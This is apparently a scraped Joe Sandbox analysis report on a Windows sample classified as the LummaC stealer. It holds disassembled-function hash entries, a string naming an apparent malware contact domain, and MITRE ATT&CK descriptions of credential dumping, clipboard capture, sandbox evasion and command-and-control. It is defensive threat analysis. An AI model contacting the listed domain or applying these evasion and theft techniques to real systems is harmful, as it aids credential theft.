Function 028EFED9 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b2d00660f366a929872734fa2691ccc52a472e25a350a750b761f86cdd176fd
Instruction ID: 51d9c355fef269b5e902298dde6658c54b5ec8b21f7af89357adcab2974fceda
Opcode Fuzzy Hash: 7b2d00660f366a929872734fa2691ccc52a472e25a350a750b761f86cdd176fd
Instruction Fuzzy Hash: 15C04C28A881055A81199A16DDE1879B3B96A87A45740781CD906D3660DB14D415D51D

Uniqueness

Uniqueness Score: -1.00%

Function 02377FBE Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3f1035c1401d21b34ad4db02c73ed8df596dac4499ff47489de15c59aee4e8d
Instruction ID: 8b35dc4ed4a9966cb47b13b221a0358a275917a8b9a254330dbaa609285bd0fa
Opcode Fuzzy Hash: f3f1035c1401d21b34ad4db02c73ed8df596dac4499ff47489de15c59aee4e8d
Instruction Fuzzy Hash: 72C04C3CBAD240978348CF00D990875F77AE78B212B19B12DEC5513325D534E886850C

Uniqueness

Uniqueness Score: -1.00%

Function 028F6582 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dab14fbd9ec27358232a43ec7406c6c75dd34ccd126d571c9b1d95cd2f411f9
Instruction ID: 6812e202ca68772716373fe9f6d7b7b36e84de1cb127162915d69e8b58d5717a
Opcode Fuzzy Hash: 2dab14fbd9ec27358232a43ec7406c6c75dd34ccd126d571c9b1d95cd2f411f9
Instruction Fuzzy Hash: 6FC04C38FAE240978358CD00D590879F37BF78B212B19B52DEC591331AD534E86E8508

Uniqueness

Uniqueness Score: -1.00%

Function 0239AE9D Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80402a54a2eb80e0272eadae08c2f832bf20fb6b3d132a6f8ec30e6a10445a34
Instruction ID: b9894db37ae32ee18a48b4ed2c803f881acc9e4ff8f0547e5b61e8919c04ec24
Opcode Fuzzy Hash: 80402a54a2eb80e0272eadae08c2f832bf20fb6b3d132a6f8ec30e6a10445a34
Instruction Fuzzy Hash: DBB002B8E58305AF8704DE25D480826F7F0AB5A260F11B859A495E7221D235D840CE59

Uniqueness

Uniqueness Score: -1.00%

Function 02919461 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80402a54a2eb80e0272eadae08c2f832bf20fb6b3d132a6f8ec30e6a10445a34
Instruction ID: b9894db37ae32ee18a48b4ed2c803f881acc9e4ff8f0547e5b61e8919c04ec24
Opcode Fuzzy Hash: 80402a54a2eb80e0272eadae08c2f832bf20fb6b3d132a6f8ec30e6a10445a34
Instruction Fuzzy Hash: DBB002B8E58305AF8704DE25D480826F7F0AB5A260F11B859A495E7221D235D840CE59

Uniqueness

Uniqueness Score: -1.00%

Function 02383627 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2025978864.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61740a4a6b66c39d809455402d7a4086d40630e1e758bb71a0f0d6e76ce45bab
Instruction ID: 52999745cbb203c1a25c64183f6c0f89abb0d6799bf4f8fa6901f5394969ad65
Opcode Fuzzy Hash: 61740a4a6b66c39d809455402d7a4086d40630e1e758bb71a0f0d6e76ce45bab
Instruction Fuzzy Hash: EB90022CC0A002C9C1400F405491070F170F21371BE0072A052A1330158560C101954C

Uniqueness

Uniqueness Score: -1.00%

Function 02901BEB Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2261ab382b574a44203b80704e2b5621d43ef5f5fd84175216e2b5031f7092c
Instruction ID: ab8e230c78ed7215af6892712e64e552e25d4cbaf159dd9d610a8abda5161260
Opcode Fuzzy Hash: b2261ab382b574a44203b80704e2b5621d43ef5f5fd84175216e2b5031f7092c
Instruction Fuzzy Hash: 6390022CC4E042C9C1500D405091070F170F22331AE01769041A1330054524C015854C

Uniqueness

Uniqueness Score: -1.00%

Function 028EDBF0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 403COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 028EDE17
ExitProcess.KERNEL32 ref: 028EDE26
ExitProcess.KERNEL32 ref: 028EDE35
ExitProcess.KERNEL32 ref: 028EDE44

Strings

palmeventeryjusk.shop, xrefs: 028EE11C

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: ExitProcess
String ID: palmeventeryjusk.shop
API String ID: 621844428-2264093211
Opcode ID: 4a8dd9e28c7d4ae3289b3bac15f90c830a2210ab0d1a5136378020a55a64685b
Instruction ID: 442c37b7e55e7314c6b4d5cc8597dc9b3c03b8eb824767db47af8e25fd9ef78f
Opcode Fuzzy Hash: 4a8dd9e28c7d4ae3289b3bac15f90c830a2210ab0d1a5136378020a55a64685b
Instruction Fuzzy Hash: 36220764008BC1CED726CF3C8498716BFA16B56224F1987CCD8EA4F7E7C3659509CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02909E94 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 02909E9E

Part of subcall function 029159F0: RtlAllocateHeap.NTDLL(?,00000000,028E9E11), ref: 02915A87

Strings

7, xrefs: 0290A038
,, xrefs: 0290A030
0, xrefs: 0290A028

Memory Dump Source

Source File: 00000000.00000002.2026949210.00000000028E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 028E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e1000_file.jbxd

Similarity

API ID: AllocateHeapString
String ID: ,$0$7
API String ID: 983180023-2155719752
Opcode ID: 66b53285f9e950d8de8ce7368653b6211beb02464682de9ef41bc3e8f8cc725a
Instruction ID: 401c2cdf6d9d7e515c43c204c703b90b529a439cfa5f67b1a9dd8a1902b42ed3
Opcode Fuzzy Hash: 66b53285f9e950d8de8ce7368653b6211beb02464682de9ef41bc3e8f8cc725a
Instruction Fuzzy Hash: 9591D571A497858FD335CE2CC4D07EBBBD2AB96324F094A2CD5E58B3C1D6359844CB82

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Windows Analysis Report
file.exe

Function 02360C99 Relevance: 7.6, APIs: 5, Instructions: 100
threadprocessCOMMON

Function 028E9D20 Relevance: 6.7, Strings: 5, Instructions: 468
COMMON

Function 028E4C40 Relevance: 5.5, Strings: 4, Instructions: 498
COMMON

Function 029184D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138
libraryCOMMON

Function 0290A245 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 83
memoryCOMMON

Function 028ED5D0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 399
COMMON

Function 029171E7 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41
libraryCOMMON

Function 028E9240 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Function 029140A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26
COMMON